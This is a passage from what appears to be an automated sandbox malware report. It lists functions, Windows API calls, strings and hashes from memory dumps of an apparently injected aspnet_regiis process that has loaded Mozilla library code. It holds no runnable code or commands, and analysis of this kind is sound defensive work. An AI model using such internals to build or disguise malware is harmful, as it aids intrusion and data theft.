                                                                                                                            • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                            • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                                            Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                            • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                                            • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                            • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                                            Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1699248803-0
                                                                                                                            • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                            • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                                            • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                            • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                                            Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                            • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                                            • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                            • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                                            Function 0041C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                            • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                            • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                            • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                            Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                            • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                            • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                            • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

                                                                                                                            Non-executed Functions

                                                                                                                            Function 6CC36C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC36CCC
                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC36D11
                                                                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC36D26
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CC36D35
                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC36D53
                                                                                                                            • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CC36D73
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC36D80
                                                                                                                            • CertGetNameStringW.CRYPT32 ref: 6CC36DC0
                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC36DDC
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC36DEB
                                                                                                                            • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CC36DFF
                                                                                                                            • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CC36E10
                                                                                                                            • CryptMsgClose.CRYPT32(00000000), ref: 6CC36E27
                                                                                                                            • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CC36E34
                                                                                                                            • CreateFileW.KERNEL32 ref: 6CC36EF9
                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CC36F7D
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC36F8C
                                                                                                                            • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CC3709D
                                                                                                                            • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC37103
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC37153
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CC37176
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC37209
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3723A
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3726B
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3729C
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC372DC
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3730D
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC373C2
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC373F3
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC373FF
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC37406
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC3740D
                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC3741A
                                                                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC3755A
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC37568
                                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CC37585
                                                                                                                            • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC37598
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC375AC
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                            • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                            • API String ID: 3256780453-3980470659
                                                                                                                            • Opcode ID: ccdd6fcbc26490d718b1e7629f44059804db5bf18e42a0810a7b19eaf42f9b6e
                                                                                                                            • Instruction ID: ad73e02b8f69867e7ffebffb1aab6344ae85c70a613901aae513ccdebfa90623
                                                                                                                            • Opcode Fuzzy Hash: ccdd6fcbc26490d718b1e7629f44059804db5bf18e42a0810a7b19eaf42f9b6e
                                                                                                                            • Instruction Fuzzy Hash: 7152E7B1A00225DFEB21DF65DD88BAE77B8FB46704F005199E40DA7640EB70AE85CF91
                                                                                                                            Function 6CC364C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CC364DF
                                                                                                                            • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CC364F2
                                                                                                                            • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CC36505
                                                                                                                            • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CC36518
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC3652B
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC3671C
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC36724
                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC3672F
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC36759
                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC36764
                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CC36A80
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC36ABE
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC36AD3
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC36AE8
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC36AF7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                            • API String ID: 487479824-2878602165
                                                                                                                            • Opcode ID: a88dcf9fd52aa0d283eecdb0902543ce8139db41cc1a85667682f002a4ddfe2e
                                                                                                                            • Instruction ID: b059355ef27e424e2e24255db2b84c097e77144a9ef613de09c265de26f6bd28
                                                                                                                            • Opcode Fuzzy Hash: a88dcf9fd52aa0d283eecdb0902543ce8139db41cc1a85667682f002a4ddfe2e
                                                                                                                            • Instruction Fuzzy Hash: 05F1E070905A298FCB20CF65EC8CB9AB7B4BF06308F145299D80DA7641F731AE84CF90
                                                                                                                            Function 6CC67E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpystrlen
                                                                                                                            • String ID: (pre-xul)$data$name$schema
                                                                                                                            • API String ID: 3412268980-999448898
                                                                                                                            • Opcode ID: 588259089b6d6a87795ae3a57eeeacf8ddef342d679498dcc92377cab5ba0481
                                                                                                                            • Instruction ID: 24cd54955d16e65e8e2e3ec8070e8906602af9f7fc9a05b417d143f4ddb0f0ae
                                                                                                                            • Opcode Fuzzy Hash: 588259089b6d6a87795ae3a57eeeacf8ddef342d679498dcc92377cab5ba0481
                                                                                                                            • Instruction Fuzzy Hash: 9DE190B1A043518FC710CF69984065BFBE9BFC5354F14892DE899E7790EB70DD0A8B92
                                                                                                                            Function 6CC4D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D4F2
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D50B
                                                                                                                              • Part of subcall function 6CC2CFE0: EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC2CFF6
                                                                                                                              • Part of subcall function 6CC2CFE0: LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC2D026
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D52E
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE7DC), ref: 6CC4D690
                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC4D6A6
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE7DC), ref: 6CC4D712
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D751
                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CC4D7EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                            • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                            • API String ID: 2690322072-3894294050
                                                                                                                            • Opcode ID: 23430af9d9d7ff312a8e61747a9e503943d0d0f89797de427916d83e9692939a
                                                                                                                            • Instruction ID: b7654e2f58b5a69547aa0ed0d0f5bb903d38d355f55cfc9592612fbf3d292644
                                                                                                                            • Opcode Fuzzy Hash: 23430af9d9d7ff312a8e61747a9e503943d0d0f89797de427916d83e9692939a
                                                                                                                            • Instruction Fuzzy Hash: 8F91AE71A047018FD718DF69C4A466AB7F1FB89314F14C92EE59AC7A85EB30E845CB82
                                                                                                                            Function 6CC84EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 6CC84EFF
                                                                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC84F2E
                                                                                                                            • moz_xmalloc.MOZGLUE ref: 6CC84F52
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000), ref: 6CC84F62
                                                                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC852B2
                                                                                                                            • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC852E6
                                                                                                                            • Sleep.KERNEL32(00000010), ref: 6CC85481
                                                                                                                            • free.MOZGLUE(?), ref: 6CC85498
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 4104871533-3887548279
                                                                                                                            • Opcode ID: 2ef6f12cddd6e34a64fa20ae7951338ced75201896359d558ead8571611365d0
                                                                                                                            • Instruction ID: 7b0ef78d63b19396aae7f37ccf28b9b0cfe0a9b9032b7ffaaace76b7f9539b84
                                                                                                                            • Opcode Fuzzy Hash: 2ef6f12cddd6e34a64fa20ae7951338ced75201896359d558ead8571611365d0
                                                                                                                            • Instruction Fuzzy Hash: BEF1D271A19B408FD716CF39C85062BB7F9AFD6384F05872EF846A7651EB31D8428B81
                                                                                                                            Function 6CC72C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC72C31
                                                                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC72C61
                                                                                                                              • Part of subcall function 6CC24DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC24E5A
                                                                                                                              • Part of subcall function 6CC24DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC24E97
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC72C82
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC72E2D
